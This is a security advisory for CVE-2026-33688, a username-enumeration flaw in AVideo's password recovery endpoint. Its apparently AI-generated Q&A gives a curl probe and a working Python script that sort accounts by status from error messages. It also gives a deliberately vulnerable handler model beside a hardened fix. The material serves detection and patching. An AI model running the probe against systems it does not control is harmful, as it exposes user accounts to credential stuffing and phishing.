CVE-2026-33688
Received - Intake
Username Enumeration in WWBN AVideo Password Recovery Endpoint

Publication date: 2026-03-23

Last updated on: 2026-03-25

Assigner: GitHub, Inc.

Description
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the password recovery endpoint at `objects/userRecoverPass.php` performs user existence and account status checks before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned, at scale and without solving any captcha, by observing three distinct JSON error responses. Commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 contains a patch.
Meta Information
Published: 2026-03-23
Last Modified: 2026-03-25
Generated: 2026-05-07
AI Q&A: 2026-03-23
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor: wwbn; Product: avideo; Version / Range: up to and including 26.0
CWE
CWE-204 (Observable Response Discrepancy): The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33688 is a vulnerability in the WWBN AVideo platform's password recovery endpoint (`objects/userRecoverPass.php`) in versions up to and including 26.0. The issue arises because the endpoint checks whether a user exists, and what the account's status is, before validating the captcha. This allows an unauthenticated attacker to enumerate valid usernames and determine whether accounts are active, inactive, or banned by observing three distinct JSON error responses, all without solving any captcha.

Specifically, the endpoint returns different error messages for non-existent users, inactive users, and active users, which can be used as an oracle to reveal user information at scale. There is no rate limiting or brute force protection on this endpoint, making automated enumeration feasible. [2]


How can this vulnerability impact me?

This vulnerability can impact you by allowing attackers to enumerate valid usernames and determine account statuses without authentication or captcha solving. This information disclosure can facilitate several malicious activities:

  • Username Enumeration: Attackers can identify registered usernames.
  • Account Status Disclosure: Attackers can distinguish active, inactive, and banned accounts.
  • Credential Stuffing Facilitation: Valid usernames can be targeted in brute-force or credential stuffing attacks.
  • Phishing Risk: Knowledge of valid active accounts enables targeted social engineering attacks.
  • Automated Enumeration: Lack of rate limiting allows high-speed automated attacks.

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by sending requests to the password recovery endpoint `objects/userRecoverPass.php` for different usernames, omitting the captcha, and comparing the JSON error responses:

  • Query a non-existent username: the response contains the error message "User not found".
  • Query a valid active username: the response contains the error message "Captcha is empty", indicating the user exists and is active.
  • Query an inactive or banned username: the response contains the error message "The user is not active".

These distinct responses allow an attacker to enumerate valid usernames and determine account statuses without solving any captcha.

Example command using curl to test a username (replace USERNAME and the hostname accordingly):

  curl -X POST -d "user=USERNAME" https://your-avideo-instance.com/objects/userRecoverPass.php

By automating such requests with different usernames and analyzing the JSON responses, you can detect if the vulnerability exists on your system. The simplest check is to send the same captcha-less request for a random username that cannot exist and for an account you know is valid: on a patched instance both requests receive the same response, on a vulnerable one they differ. [2]
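The check described above, written out as an added example (this is not code from the advisory or from the AVideo project). It assumes the POST field is named `user`, as in the curl command, and, because the advisory does not show the JSON layout, it matches the three error messages as substrings of the raw body rather than by key. The sample bodies at the bottom are constructed so the classifier can be exercised offline.

```python
"""Added example, not code from the advisory or from the AVideo project: probe
objects/userRecoverPass.php for the response-discrepancy oracle described above.

Assumptions (not stated by the advisory): the POST field is `user`, as in the
curl example; the JSON layout of the error body is unknown, so the three
messages are matched as substrings of the raw body.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# The three messages named in the detection notes, mapped to what they reveal.
ORACLE_SIGNATURES = {
    "User not found": "nonexistent",
    "The user is not active": "inactive_or_banned",
    "Captcha is empty": "active",
}


def classify(body: str) -> str:
    """Return the account state a body reveals, or 'unknown' if no message matches."""
    for needle, state in ORACLE_SIGNATURES.items():
        if needle in body:
            return state
    return "unknown"


def oracle_present(bodies: dict) -> bool:
    """True when different usernames produce distinguishable responses.

    `bodies` maps each probed username to its raw response body. A fixed
    endpoint answers every captcha-less request the same way, so the set of
    observed states (or, if none of the known messages appear, raw bodies)
    has size 1.
    """
    states = {classify(b) for b in bodies.values()}
    if states != {"unknown"}:
        return len(states) > 1
    return len({b.strip() for b in bodies.values()}) > 1


def probe(base_url: str, username: str, timeout: float = 10.0) -> str:
    """POST one username with no captcha field; return the body even on HTTP 4xx/5xx."""
    data = urllib.parse.urlencode({"user": username}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/objects/userRecoverPass.php",
        data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


# Constructed sample bodies standing in for an unpatched instance. The JSON
# shape is made up for the example; only the message text comes from the page.
SAMPLE_UNPATCHED = {
    "no-such-user-7f3a9c": '{"error":true,"msg":"User not found"}',
    "alice": '{"error":true,"msg":"Captcha is empty"}',
    "bob": '{"error":true,"msg":"The user is not active"}',
}
# What the same three probes look like once the captcha is checked first.
SAMPLE_PATCHED = {u: '{"error":true,"msg":"Captcha is empty"}' for u in SAMPLE_UNPATCHED}


def run(base_url=None, usernames=()):
    """Probe a live instance if a URL is given, else classify the sample bodies."""
    if base_url:
        bodies = {u: probe(base_url, u) for u in usernames}
    else:
        bodies = SAMPLE_UNPATCHED
    return {u: classify(b) for u, b in bodies.items()}, oracle_present(bodies)


if __name__ == "__main__":
    # usage: python probe.py [https://your-avideo-instance.example user1 user2 ...]
    states, vulnerable = run(sys.argv[1] if len(sys.argv) > 1 else None, sys.argv[2:])
    for user, state in states.items():
        print(f"{user}: {state}")
    print("oracle present:", vulnerable)
```

Run it against your own instance with one username you know exists and one random string that cannot exist; `oracle_present` returning True means the endpoint still answers differently before any captcha is checked. Because the script never supplies a captcha, it exercises exactly the pre-captcha code path the advisory describes and does not trigger a recovery email.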


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include modifying the password recovery endpoint to validate the captcha before performing any user existence or account status checks.

  • Enforce captcha validation upfront: Return an error if the captcha is missing or invalid before checking the username.
  • Return a generic success message regardless of whether the user exists or their status, to prevent information disclosure.
  • Implement rate limiting on the password recovery endpoint to prevent automated bulk enumeration attempts.
  • Apply the patch from commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157 which enforces captcha validation and improves error handling.

These steps will prevent attackers from enumerating usernames and account statuses without solving captchas and reduce the risk of automated abuse.
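The mitigation steps above, modelled as an added example in Python (this is not the project's PHP and not the patch from the commit named above). The vulnerable function reproduces the check order the advisory describes, the hardened one validates the captcha first and then returns one body regardless of account state, and a small sliding-window limiter stands in for the rate limiting bullet. The user table, status values, captcha token, the "invalid captcha" and "too many requests" wording, and the generic success text are all constructed for the example; only the three error messages and the check ordering come from the page.

```python
"""Added example, not the project's PHP: a Python model of the recovery handler
that contrasts the vulnerable check order (user lookup and status before the
captcha) with the corrected order from the mitigation notes, plus a simple
per-client rate limit. User table, status values, captcha token and the
success/limit wording are constructed; only the three error messages and the
ordering come from the advisory.
"""
import time
from collections import defaultdict, deque
from typing import Optional

# Constructed user table: status 'active', 'inactive' or 'banned'.
USERS = {"alice": "active", "carol": "inactive", "bob": "banned"}
SENT_EMAILS = []  # records which accounts a recovery email went to


def captcha_is_valid(captcha: str) -> bool:
    """Stand-in for the real captcha check: one fixed token counts as solved."""
    return captcha == "correct-captcha"


def vulnerable_recover(user: str, captcha: str) -> dict:
    """Versions up to 26.0: account checks run before the captcha is validated,
    so a request with no captcha already reveals which of three branches it hit."""
    status = USERS.get(user)
    if status is None:
        return {"error": True, "msg": "User not found"}
    if status != "active":
        return {"error": True, "msg": "The user is not active"}
    if not captcha:
        return {"error": True, "msg": "Captcha is empty"}
    if not captcha_is_valid(captcha):
        return {"error": True, "msg": "Captcha is invalid"}  # wording constructed
    SENT_EMAILS.append(user)
    return {"error": False, "msg": "Recovery email sent"}  # wording constructed


GENERIC_MSG = "If that account exists and is active, a recovery email has been sent"


def hardened_recover(user: str, captcha: str) -> dict:
    """Captcha first; then one response body regardless of account state."""
    if not captcha:
        return {"error": True, "msg": "Captcha is empty"}
    if not captcha_is_valid(captcha):
        return {"error": True, "msg": "Captcha is invalid"}  # wording constructed
    if USERS.get(user) == "active":
        SENT_EMAILS.append(user)  # the side effect differs, the response does not
    return {"error": False, "msg": GENERIC_MSG}


class RateLimiter:
    """Sliding-window counter per client key (in-memory, single process)."""

    def __init__(self, limit: int, window_s: float):
        self.limit, self.window = limit, window_s
        self.hits = defaultdict(deque)

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def handle(client: str, user: str, captcha: str, limiter: RateLimiter,
           now: Optional[float] = None) -> dict:
    """Hardened endpoint behind the limiter: bulk probing is cut off before any lookup."""
    if not limiter.allow(client, now):
        return {"error": True, "msg": "Too many requests"}  # wording constructed
    return hardened_recover(user, captcha)


def distinct_responses(handler, captcha: str) -> int:
    """Number of different bodies the handler yields across an active, an inactive,
    a banned and an unknown user: 1 means no oracle, 3 means enumeration works."""
    probes = ["alice", "carol", "bob", "no-such-user"]
    return len({handler(u, captcha)["msg"] for u in probes})


if __name__ == "__main__":
    print("vulnerable, no captcha:  ", distinct_responses(vulnerable_recover, ""))  # 3
    print("hardened, no captcha:    ", distinct_responses(hardened_recover, ""))  # 1
    print("hardened, valid captcha: ", distinct_responses(hardened_recover, "correct-captcha"))  # 1
```

The point of `distinct_responses` is the regression check you want in a test suite after applying the fix: with the captcha missing, every username must map to the same body, and with a valid captcha the body must still not depend on whether the account exists or is active. Keeping the email side effect while making the response uniform is what closes the oracle without breaking recovery for real users.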

